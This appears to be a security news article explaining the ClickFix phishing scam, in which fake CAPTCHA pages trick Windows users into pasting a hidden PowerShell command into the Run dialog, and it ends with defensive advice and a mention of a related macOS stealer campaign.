A new phishing attack called ClickFix uses a simple but effective social engineering technique. In order to trick victims into executing malicious commands on their devices, attackers disguise them as regular CAPTCHAs or «I’m not a robot» buttons.
A new phishing attack called ClickFix uses a simple but effective social engineering technique. In order to trick victims into executing malicious commands on their devices, attackers disguise them as regular CAPTCHAs or «I’m not a robot» buttons.
The ClickFix phishing scam,analyzed by SlashNext experts, works by masquerading as well-known online security features, such as the Cloudflare Turnstile captcha. The link describes how users are shown a fake «human verification» page. It includes official logos and even a unique «Ray ID» to make it look as believable as possible.
After clicking on «Prove you are human,» the victim is prompted to perform a series of steps: open the Windows Run dialog (Win+R), paste the contents of the clipboard (Ctrl+V), and press Enter. At this point, the user silently runs a hidden PowerShell script that has already been copied to the clipboard using malicious JavaScript. This script typically downloads and runs second-tier malware, such as remote access trojans or data-stealing programs.
ClickFix avoids traditional file download methods because the user runs a system command, which helps bypass antivirus tools that primarily monitor new executables. The phishing page is often created as a single HTML file with locally embedded resources and obfuscated code to hide malicious operations.
The secret to ClickFix’s success is in using human trust and the habit of quickly passing captchas and security checks. Many users simply trust a familiar interface, not suspecting that they are inserting dangerous code into the system. Even checking the URL may not help if the page is hosted on a similar domain or a hacked site.
ClickFix phishing demonstrates that modern cybersecurity threats increasingly focus on user deception rather than the complexity of technical vulnerabilities. Antivirus and browser developers should adapt to new social engineering techniques. At the same time, users should follow basic security rules, carefully check actions that require system commands, and train themselves to recognize the signs of fake interfaces.
This attack shows that cybercriminals do not always need sophisticated exploits, but can choose methods that manipulate user behavior. Therefore, it is important to remind people to be careful, never insert unfamiliar commands into system tools, and use modern solutions to protect their browser and network.
A somewhat similar social engineering method is being used by Russian hackers. A new attack on macOS users has been recorded by CloudSek. The attackers are distributing AtomicOS (AMOS) malware that steals passwords, crypto wallets, and system data.
